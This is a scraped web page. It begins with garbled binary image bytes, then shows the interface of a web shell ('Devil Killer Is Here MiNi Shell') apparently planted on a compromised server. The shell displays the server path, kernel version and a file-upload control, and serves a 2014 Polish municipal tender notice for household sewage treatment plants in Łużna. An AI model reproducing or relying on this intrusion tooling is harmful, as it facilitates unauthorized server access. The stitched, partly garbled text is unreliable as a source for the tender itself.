JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140828/184425-N-2014.html

<p class="kh_header"><b>Łużna: Budowa przydomowych oczyszczalni ścieków na terenie gminy Łużna</b><br>
<b>Numer ogłoszenia: 184425 - 2014; data zamieszczenia: 28.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łużna , Łużna 634, 38-322 Łużna, woj. małopolskie, tel. 018 3543922, faks 018 3543039.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> BIP Gminy Łużna</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przydomowych oczyszczalni ścieków na terenie gminy Łużna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest : Budowa przydomowych oczyszczalni ścieków na terenie gminy Łużna
2.	Zakres robót budowlanych obejmuje wykonanie przydomowych oczyszczalni ścieków w następujących wariantach:

Wariant oczyszczalni	Przepustowość l/d	Ilość
4 RLM - ciśnieniowa-wkopana	400 l/d	5 szt.
8 RLM - ciśnieniowa-wkopana	800 l/d	7 szt.
12 RLM - ciśnieniowa-wkopana	1200 l/d  2 szt. 
4 RLM - ciśnieniowa-wyniesiona	400 l/d	23 szt.
8 RLM - ciśnieniowa-wyniesiona	800 l/d	30 szt. 
12 RLM - ciśnieniowa-wyniesiona	1200 l/d	2 szt.
4 RLM - grawitacyjna-wkopana	400 l/d	12 szt. 
4 RLM - grawitacyjna-drenaż	400 l/d	2 szt.
4 RLM - ciśnieniowa-osad czynny	400 l/d	1 szt.
RAZEM:		                                      84 szt.

3.	Oferowany system oczyszczania ścieków musi posiadać niżej wymienione parametry techniczne:
1)	Konstrukcja osadnika gnilnego musi zapewniać wytrzymałość na nasyp gruntem o wysokości 1,2 wraz ze zwierciadłem wód gruntowych sięgającym połowy wysokości zbiornika
2)	Oczyszczalnie ścieków musi spełniać wymagania Rozporządzenia Ministra Środowiska z dnia 24 lipca 2006r. (dz. U. Nr 137, poz. 984 z póź. zmianami) w sprawie warunków, jakie należy spełniać przy wprowadzaniu ścieków do wód lub ziemi, oraz w sprawie substancji szkodliwych dla środowiska wodnego.
3)	Wszystkie pojedyncze systemy musza legitymować się najwyższymi dopuszczalnymi wartościami wskaźników zanieczyszczeń dla oczyszczonych ścieków:
Pięciodobowe biochemiczne zapotrzebowanie tlenu (BZT5) - 40 mg O2/l
Chemiczne zapotrzebowanie tlenu (ChZT) - 150 mg O2/l
Zawiesiny ogólne - 50 mg/l
Azot ogólny - 30 mg/l
4)	Wymaga się, aby częstotliwość wywozu osadów nadmiernych z oczyszczalni ścieków objętych zamówieniem była nie większa niż jeden raz na rok.
4.	W ramach realizacji przedmiotu zamówienia Wykonawca:
1)	dokona rozruchu technologicznego każdej oczyszczalni.
2)	indywidualnie przeszkoli użytkowników w zakresie obsługi urządzeń i instalacji   oczyszczalni, przekaże im instrukcje obsługi,
3)	protokolarnie przekaże wykonane   oczyszczalnie władającym   nieruchomościami objętymi inwestycją,
4)	zapewni obsługę geodezyjną inwestycji,
5)	wykona inwentaryzację geodezyjną powykonawczą obiektów ( w 3 egz.),
6)	sporządzi i przedłoży dokumentacje odbiorową powykonawczą (w 2 egz.),
7)	udzieli Zamawiającemu na wykonany przedmiot umowy 60 miesięcy gwarancji.

5. Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa (zał. nr 7 do SIWZ) oraz specyfikacja   techniczna wykonania i odbioru robót budowlanych    (zał. Nr 8 do SIWZ),    stanowiące   załączniki do   SIWZ, które są  dostępne w wersji elektronicznej na stronie internetowej    Zamawiającego.
6. Zestawienie robót planowanych do wykonania w ramach w/w zamówienia określają przedmiary robót (zał. Nr 9 do SIWZ), stanowiące materiał pomocniczy i informacyjny do sporządzenia wyceny.
7. Jeżeli, dostarczona przez Zamawiającego dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót, będą zawierały wady, które uniemożliwią prawidłowe wykonanie robót, albo jeżeli zajdą inne okoliczności, niezależne od Wykonawcy, które mogą przeszkodzić prawidłowemu wykonaniu robót, Wykonawca niezwłocznie powiadomi o tym fakcie Zamawiającego. Zamawiający dokona wówczas analizy zaistniałego przypadku i po uzyskaniu stanowiska inspektora nadzoru będzie uprawniony do modyfikacji zakresu świadczenia wykonawcy, w taki sposób aby był zrealizowany cel umowy z zachowaniem obowiązujących przepisów.
8. W przypadku, gdy nastąpi konieczność istotnej  modyfikacji zakresu  świadczenia Wykonawcy, strony dokonają zmiany umowy w formie aneksu. Dokonując modyfikacji zakresu świadczenia Wykonawcy, strony wyodrębnią:
1)	roboty zamienne, przez które rozumie się roboty niezbędne do prawidłowego wykonania w zamian za roboty zawarte w pierwotnej dokumentacji projektowej;
2)	roboty zaniechane, przez które rozumie się roboty objęte pierwotną dokumentacją projektową, a których wykonanie stało się zbędne.
9. Zamawiający zastrzega, że wszystkie ewentualnie podane w SIWZ opisy nazw własnych materiałów   (wyrobów) , wyposażenia w sprzęt nie mają na celu naruszenia art. 29 i 7 ustawy Pzp, a mają jedynie za zadanie   sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego.    Należy rozumieć to jako   określenie wymaganych minimalnych parametrów użytkowych, funkcjonalnych i technicznych   lub standardów jakościowych.   Oznacza to,  że zgodnie   z art. 29 ustawy Pzp, na wskazane z nazwy materiały   (wyroby) i wyposażenie w sprzęt Zamawiający dopuszcza zastosowanie równoważnych   materiałów   i wyrobów o nie gorszych parametrach użytkowych, funkcjonalnych i technicznych   niż     opisane w   załączniku do niniejszej SIWZ. Ciężar udowodnienia,   że materiał (wyrób)   jest   równoważny w stosunku do   wymogu   określonego przez Zamawiającego spoczywa na   składającym ofertę.   W takim przypadku   Wykonawca musi      przedłożyć odpowiednie dokumenty opisujące      parametry techniczne, wymagane prawem   certyfikaty i inne   dokumenty dopuszczające dane materiały   (wyroby) do użytkowania, oraz pozwalające     jednoznacznie   stwierdzić, że są one rzeczywiście równoważne.
10. W ramach dokumentacji przetargowej dopuszcza się zastosowanie systemu równoważnego:  
1)	w miejsce projektowanego osadnika gnilnego dopuszcza się budowę przydomowej biologicznej oczyszczalni ścieków typu SBR (reaktor pracujący w sposób sekwencyjny)
2)	w miejsce bioreaktora hydrofitowego dopuszcza się system infiltracyjny składający się z tuneli lub skrzynek rozsączających. 
Metoda równoważna dopuszcza zasilanie reaktora SBR z terenu działki, na której będzie budowana przydomowa oczyszczalnia ścieków. 
11. Pojedynczy system równoważny musi składać się z następujących elementów składowych:
1) Przyłącze kanalizacyjne (jako odcinek od wewnętrznej powierzchni budynku do reaktora oczyszczalni)
2) Przydomowa biologiczna oczyszczalnia ścieków musi spełniać wymogi normy PN-EN 12566-3+A1:2009. Wymaga się, aby w ofercie przedłożono raport z badań PBOŚ wykonany wyłącznie przez jednostki notyfikowane, które zostały wymienione w wykazie dostępnym na stronie KE.  Raport musi zawierać wyniki badań skuteczności oczyszczania, wytrzymałości, wodoszczelności oraz trwałości materiału. Wykonawca musi do oferty dołączyć Deklarację Właściwości Użytkowych (DWU) wykonanej na podstawie powyższych badań oraz upoważniających do znakowania wyrobu znakiem CE. Zamawiający wymaga, aby raport z badań wykonany przez jednostkę notyfikowaną, potwierdzał, że konstrukcja zbiornika zapewnia wytrzymałość na nasyp gruntem o wysokości 1,2 metra wraz ze zwierciadłem wód gruntowych sięgającym połowy wysokości zbiornika
3)	Panel sterujący (sterownik) - odpowiadający za pracę oczyszczalni musi znajdować się w zewnętrznej obudowie, ułatwiającej łatwy dostęp do programatora oraz musi posiadać następujące programy oczyszczania: 
1.	Wakacyjny (zmniejszony przepływ ścieków, podtrzymanie pracy oczyszczalni)
2.	Denitryfikacyjny (wspomagający redukcję azotu)
3.	Alarm awarii systemu
4)	Odprowadzenie ścieków oczyszczonych od reaktora oczyszczalni do układu rozsączania ścieków oczyszczonych. Miejsce pomiarowo kontrolne poboru próbek musi być zintegrowane z oczyszczalnią i znajdować się w jej wnętrzu.
5)	System rozsączający ścieki oczyszczone. Zamawiający z uwagi na uwarunkowania techniczne preferuje tunele rozsączające lub skrzynki magazynująco - rozsączające wg założenia 1 os. (100 l) /1 m2 powierzchni rozsączania (licząc wyłącznie pow. dna). Systemy rozsączające muszą legitymować się Aprobatami Technicznymi.
6)	Wszystkie pojedyncze systemy musza legitymować się najwyższymi dopuszczalnymi wartościami wskaźników zanieczyszczeń dla oczyszczonych ścieków:
Pięciodobowe biochemiczne zapotrzebowanie tlenu (BZT5) - 40 mg O2/l.
Chemiczne zapotrzebowanie tlenu (ChZT) - 150 mg O2/l
Zawiesiny ogólne - 50 mg/l.
Azot ogólny - 30 mg/l 
7)	Wymaga się, aby częstotliwość wywozu osadów nadmiernych z oczyszczalni ścieków objętych zamówieniem była nie większa niż jeden raz na rok.
12. Do realizacji przedmiotu zamówienia Wykonawca zobowiązany jest stosować materiały i urządzenia posiadające obowiązujące świadectwa dopuszczenia do stosowania w budownictwie. Jakość materiałów powinna odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie.
13. Transport materiałów na plac budowy oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę.
14. Wszelkie roboty winny być prowadzone zgodnie ze sztuką budowlaną, przepisami prawa budowlanego, obowiązującymi   polskimi normami oraz normami europejskimi o ile obowiązują w Polsce, przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzonych robót.
15. Do kierowania robotami budowlanymi przy realizacji przedmiotu zamówienia Wykonawca zobowiązany jest   zapewnić osoby posiadające wymagane uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalnościach: instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych.
16. Do obowiązków Wykonawcy należeć będzie również:
1)	organizowanie i zagospodarowanie terenu budowy,
2)	zagospodarowanie odpadów zgodnie z Ustawą o odpadach z dnia 27 kwietnia 2001 r. (Dz.U. z 2012 r. poz. 1513),
3)	zabezpieczenie pomieszczeń socjalnych dla personelu Wykonawcy i podwykonawców,
4)	wykonanie niezbędnych prób, badań, odbiorów,
5)	zapewnienie ochrony terenu budowy oraz znajdującego się na nim mienia oraz warunków bezpieczeństwa,
6)	poniesienie kosztów odtworzenia uszkodzonych dróg, chodników, zieleni, koszty zużycia wody, gazu, energii elektrycznej na placu budowy,
7)	inne obowiązki wymienione w projekcie umowy stanowiący załącznik do SIWZ.
      17.  Pieczę nad realizacją zamówienia sprawuje Inspektor Nadzoru , który ocenia zgodność realizacji 	przedsięwzięcia z projektem, kontroluje jakość i ilość robót, opiniuje zasadność wykonania i 	rozliczenie robót zamiennych, kontroluje rozliczenie finansowe budowy.
   18. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności: ustawie Prawo 	budowlane z 7 lipca 1994 r. (Dz.U. z 2013 poz. 984), ustawie z 23 kwietnia 	1964 r. - 	Kodeks cywilny (Dz.U. z 2014 poz. 121) i ustawie z 29 stycznia 2004 r. - Prawo 	zamówień 	publicznych (Dz.U. z 2013 r., poz. 907 ze zm.).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % 	wartości zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp.)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 25 000,00 zł (słownie dwadzieścia pięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna pisemne oświadczenia Wykonawcy w tym zakresie  ( zał. Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy   - w tym okresie - w jednym zamówieniu (robocie budowlanej) co najmniej 50 szt przydomowych oczyszczalni ścieków, lub wykonał w jednym zamówieniu (robocie budowlanej) przydomowe oczyszczalnie ścieków o wartości co najmniej 150 tys. zł brutto. Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia w/w warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna pisemne oświadczenia Wykonawcy w tym zakresie  ( zał. Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi się wykazać, że dysponuje   lub dysponować będzie do realizacji zamówienia co najmniej  1 osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych. Zamawiający,   określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane 	obywatelom państw Europejskiego Obszaru Gospodarczego   oraz Konfederacji Szwajcarskiej, na zasadach określonych w art. 12 a oraz innych przepisów ustawy Prawo budowlane (Dz.U. z 2013 poz. 984) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2013 poz. 1650). Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia w/w warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca    musi wykazać, się posiadaniem   ubezpieczenia   od odpowiedzialności cywilnej 	w zakresie   prowadzonej działalności związanej z przedmiotem zamówienia  na kwotę nie mniejszą  niż  700 000,00 zł i dysponować środkami finansowymi lub zdolnością kredytową na kwotę nie mniejszą niż 400 000,00 zł. Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia w/w warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

